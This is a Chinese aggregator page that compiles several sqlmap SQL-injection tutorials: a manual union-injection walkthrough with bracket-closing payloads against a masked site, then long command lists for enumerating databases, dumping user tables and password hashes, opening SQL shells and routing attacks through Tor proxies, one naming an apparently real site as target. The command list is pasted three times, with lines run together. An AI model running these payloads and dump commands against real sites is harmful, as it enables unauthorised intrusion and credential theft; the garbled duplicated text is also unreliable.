自定义sqlmap注入语句进行高级注入脚本安全

“shanewong”通过精心收集，向本站投稿了5篇自定义sqlmap注入语句进行高级注入脚本安全，下面是小编收集整理后的自定义sqlmap注入语句进行高级注入脚本安全，供大家参考借鉴，欢迎大家分享。

篇1：自定义sqlmap注入语句进行高级注入脚本安全

现在能够帮助我们进行sql注入检测的工具越来越多，但我认为，通用性最强的还是sqlmap，其他工具在灵活性上远远不及sqlmap，sql注入有许多类型，其中最喜欢的当然是能够union查询的，比blind类型的不知道爽到哪里去了。

现在有一个url已知存在sql注入漏洞，我们丢到sqlmap里面，跑一下，结果是这样的

sqlmap -u “www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2” -p ppid

很明显，是一些比较恶心的注入类型，bind和error-based，难道我们就只能听工具的了么，我们手动来看一看。sq报错如下

MySQL Error

Message: MySQL Query Error

SQL: select ..... and pass=0 and (c.catid=2\' or c.parentid=2\') and subject like '%%'

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' or c.parentid=2\') and subject like '%%'' at line 4

Errno.: 1064

Click here to seek help.

报错显示，这里懂sql语句有点复杂并且不是常规懂类型，需要闭合括号还有最好屏蔽掉后面的like语句，构造一下

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 15 --

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) order by 16 --

order by确认了查出来懂总共16条，那么，继续试试

www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2) and 1=2 union% select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --

手工确认之后，使用sqlmap来继续进行，我们需要用到sqlmap的两个选项，suffix和prefix，添加以下语句的前缀和后缀，

sqlmap -u “www.ooxx.com/ooxx.php?xid=93&dxxx=news&action=find&ppid=2” -p catid --suffix=“ -- ” --prefix=“)”

成功自定义了注入的语句，出现来union类型的注入。

​

篇2：sqlmap 注入命令脚本安全

工具提供sqlmap0.9版本、、

获取数据库名

./sqlmap.py -u “www.xx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” –dbs

获取表名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database

–tables

获取列名

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_adminactions –columns

获取值

./sqlmap.py -u “www.xxx.php?nid=14550″

–user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0;

.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR

3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T

cdb_members -C username,password –dump

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap

sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 1 –sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1″

-v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c

sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php”

–method POST –data “id=1″

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php”

–cookie “id=1″ -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v

3

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1″

–auth-type Basic –auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1″

–auth-type Digest –auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:3128″

python

sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–proxy “192.168.1.47:8118″

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 1 –current-user –threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 1 -p “id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2″

-v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php”

-v 1 -p “user-agent” –user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –dbms “PostgreSQL”

* MySQL

* oracle

* PostgreSQL

*

Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-v 2 –os “Windows”

* Linux

* Windows

自定义payload

Options:

–prefix and –postfix

In some circumstances the vulnerable parameter is

exploitable only if the user provides a postfix to be appended to the injection

payload. Another scenario where these options come handy presents itself when

the user already knows that query syntax and want to detect and exploit the SQL

injection by directly providing a injection payload prefix and/or

postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query

is: $query = “Select * FROM users Where id=(‘” . $_GET['id'] . “‘) LIMIT 0,

1″;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1″

-v 3 -p “id” –prefix “‘” –postfix “AND

‘test’='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET

parameter ‘id’ with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection

on GET parameter ‘id’

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET

/sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test

HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host:

www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept:

text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent:

sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection:

close

[...]

[hh:mm:17] [INFO] GET parameter ‘id’ is custom

injectable

[...]

As you can see, the injection payload for testing for

custom injection

is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which

URL decoded is:

id=1′) AND 7433=7433 AND (‘test’='test

and makes

the query syntatically correct to the page query:

Select * FROM users

Where id=(’1′) AND 7433=7433 AND (‘test’='test’) LIMIT 0, 1

In this

simple example, sqlmap could detect the SQL injection and exploit it without

need to provide a custom injection payload, but sometimes in the real world

application it is necessary to provide it.

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–regexp “ lu[w][w]er” -v

排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1″

–excl-reg “Dynamic content: ([d]+)”

多语句测试，php内嵌函数mysql_query,不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–stacked-test -v 1

union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–union-test -v 1

unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1″

–union-test –union-tech orderby -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 –union-use –banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

-v 5 –union-use –current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1″

-v 1 –union-use –dbs

fingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

-v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther”

-v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–is-dba -v 1

列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–passwords -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–passwords -U sa -v 0

查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1″

–privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–privileges -U postgres -v 0

列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump -T users -D master -C surname -v 0

指定列的范围从2－4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump -T users -D test –start 2 –stop 4 -v 0

导出所有数据库，所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1″

–dump-all –exclude-sysdbs -v 0

sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

–sql-query “Select usename FROM pg_user” -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1″

–sql-query “Select host, password FROM mysql.user LIMIT 1, 3″ -v

1

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 -s “sqlmap.log”

保存选项到INC配置文件

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1″

-b -v 1 –save

获取数据库名：

./sqlmap.py -u “www.xx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” --dbs

获取表名：

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database --tables

获取列名

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_adminactions --columns

获取值

./sqlmap.py -u “www.xxx.php?nid=14550” --user-agent “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)” -D database -T cdb_members -C username,password --dump

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 1 --sql-shell //执行SQL语句

sqlmap.py -u “www.islamichina.com/hotelinchina.asp?cityid=2&m=1” -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf

使用POST方法提交

sqlmap.py -u “www.myhack58.com/sqlmap/oracle/post_int.php” --method POST --data “id=1”

使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/cookie_int.php” --cookie “id=1” -v 1

使用referer欺骗

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --referer “www.google.com” -v 3

使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --user-agent “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 -a “./txt/user-agents.txt”

使用基本认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1” --auth-type Basic --auth-cred “testuser:testpass” -v 3

使用Digest认证

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1” --auth-type Digest --auth-cred “testuser:testpass” -v 3

使用代理,配合TOR

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:3128”

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --proxy “192.168.1.47:8118”

使用多线程猜解

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 1 --current-user --threads 3

绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 1 -p “id

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2“ -v 1 -p ”cat,id“

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/ua_str.php“ -v 1 -p ”user-agent“ --user-agent ”sqlmap/0.7rc1 (sqlmap.sourceforge.net)“

指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --dbms ”PostgreSQL“

* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server

指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 2 --os ”Windows“

* Linux

* Windows

自定义payload

Options: --prefix and --postfix

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = ”Select * FROM users Where id=('“ . $_GET['id'] . ”') LIMIT 0, 1“;:

$ python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1“ -v 3 -p ”id“ --prefix ”'“ --postfix ”AND 'test'='test“

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --string ”luther“ -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --regexp ”lu[w][w]er“ -v

排除网站的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1“ --excl-reg ”Dynamic content: ([d]+)“

多语句测试，php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --stacked-test -v 1

union注入测试

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --union-test -v 1

unionz注入配合orderby

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_str.php?id=1“ --union-test --union-tech orderby -v 1

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 --union-use --banner

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 5 --union-use --current-user

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1“ -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ -v 1 -f

python sqlmap.py -u ”192.168.123.36/sqlmap/get_str.asp?name=luther“ -v 1 -f -b

判断当前用户是否是dba

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --is-dba -v 1

列举数据库用户

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --users -v 0

列举数据库用户密码

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --passwords -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --passwords -U sa -v 0

查看用户权限

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --privileges -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --privileges -U postgres -v 0

列数据库

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dbs -v 0

列出指定数据库指定表的列名

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --columns -T users -D test -v 1

列出指定数据库的指定表的指定列的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump -T users -D master -C surname -v 0

指定列的范围从2－4

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump -T users -D test --start 2 --stop 4 -v 0

导出所有数据库，所有表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump-all -v 0

只列出用户自己新建的数据库和表的内容

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump-all --exclude-sysdbs -v 0

sql query

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --sql-query ”Select usename FROM pg_user“ -v 0

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --sql-query ”Select host, password FROM mysql.user LIMIT 1, 3“ -v 1

Select usename, passwd FROM pg_shadow orDER BY usename

保存和恢复会话

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 -s ”sqlmap.log“

保存选项到INC配置文件

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 --save

获取数据库名

./sqlmap.py -u ”www.xx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ --dbs获取表名

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database --tables

获取列名

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_adminactions --columns

获取值

./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_members -C username,password --dump

来源：影子

更新

svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 1 --sql-shell //执行SQL语句

sqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 5 //更详细的信息

load options from a configuration INI file

sqlmap -c sqlmap.conf使用POST方法提交

sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/post_int.php“ --method POST --data ”id=1“使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies

python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/cookie_int.php“ --cookie ”id=1“ -v 1使用referer欺骗

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --referer ”www.google.com“ -v 3使用自定义user-agent,或者使用随机使用自带的user-agents.txt

python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --user-agent ”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)“ -v 3python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 -a ”./txt/user-agents.txt“

使用基本认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1“ --auth-type Basic --auth-cred ”testuser:testpass“ -v 3使用Digest认证

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1“ --auth-type Digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合TOR

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:3128“

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解

python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入

python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 1 -p ”id

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”指定数据库,绕过SQLMAP的自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --dbms “PostgreSQL”* MySQL

* oracle

* PostgreSQL

* Microsoft SQL Server指定操作系统,绕过SQLMAP自动检测

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --os “Windows”* Linux

* Windows自定义payload

Options: --prefix and --postfixIn some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “Select * FROM users Where id=('” . $_GET['id'] . “') LIMIT 0, 1”;:

$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” --prefix “'” --postfix “AND 'test'='test”

[...]

[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'

[hh:mm:16] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20

%28%27test%27=%27test HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: www.myhack58.com:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:17] [INFO] GET parameter 'id' is custom injectable

[...]As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntatically correct to the page query:

Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.

页面比较

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[w][w]er” -v排除网站的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --excl-reg “Dynamic content: ([d]+)”多语句测试，php内嵌函数mysql_query(),不支持多语句

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --stacked-test -v 1union注入测试

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --union-test -v 1unionz注入配合orderby

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1” --union-test --union-tech orderby -v 1python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 --union-use --banner

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 5 --union-use --current-user

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 --union-use --dbsfingerprint

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 -f

python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b判断当前用户是否是dba

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --is-dba -v 1列举数据库用户

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --users -v 0

列举数据库用户密码

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --passwords -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --passwords -U sa -v 0查看用户权限

python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --privileges -v 0

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --privileges -U postgres -v 0列数据库

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dbs -v 0列出指定数据库指定表的列名

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --columns -T users -D test -v 1列出指定数据库的指定表的指定列的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump -T users -D master -C surname -v 0指定列的范围从2－4

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump -T users -D test --start 2 --stop 4 -v 0导出所有数据库，所有表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump-all -v 0只列出用户自己新建的数据库和表的内容

python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump-all --exclude-sysdbs -v 0sql query

python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --sql-query “Select usename FROM pg_user” -v 0

